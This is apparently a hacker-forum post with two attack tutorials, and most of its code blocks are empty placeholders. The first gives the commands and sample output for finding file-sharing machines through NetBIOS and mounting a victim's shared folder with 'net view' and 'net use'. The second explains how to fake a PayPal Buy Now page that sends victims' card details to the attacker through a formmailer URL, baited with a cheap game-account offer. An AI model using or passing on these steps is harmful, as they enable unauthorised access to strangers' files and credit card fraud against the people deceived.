This will give you a read out that looks like this

Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________


The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Code:
Net view \\

[e.g : net view \\207.175.1.1]



You will then get a response that looks something like this.
Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)



Code:
Net use x: \\\temp

[e.g : net use x: \\207.175.1.1\temp]



If all goes well for you, you will then get a response of

Code:
(The command was completed successfully.)

Open my computer you will see your victim's temp folder there

making fisher page




Lets see Here is a tutorial how to Hack CC ........... You Can Say it Phising I call it Mind's work so Lets Start .........


Open Your PayPal account >>.


Go to Mechant Tools there is a section to Create Buttons for your
Website as Donate button shoping Cart ........... when u click on more
options you will Find Setting up a Buy Now Button...........



Wat are you waiting Get the Html Code For Buy Button it will look like




CODE



We will edit this Part Later :

Now its time to make Phisher to Grab CC



save the below Text page as html Page, after editing the reqd Parts and then upload it to free hosting server .......


CODE



You just have to edit INFO in this Line


CODE
http://www.big-llc.com/formmailer/submit


Find This Line and edit


After editing save it as Pay.html and Upload it to any free html host

Now your Uploading Link suppose its

CODE




Now Go Back To above Buy Code which u get from Paypal and Replace this
Link from Paypal's

CODE




Now apply that code anywhere in Html when Victim Clicks on Buy Now he
will get directed towards your fake page when he puts his info and
clicks agree and continue . His Details will be Mailed to u on the id u
Provided .........



One main thing y Victim input his info .......



Go man and provide them a Years RS account for just 10$ he will die to buy that and u enjoy his details lols



Its easy isnt ?



Hack and enjoy tongue.gif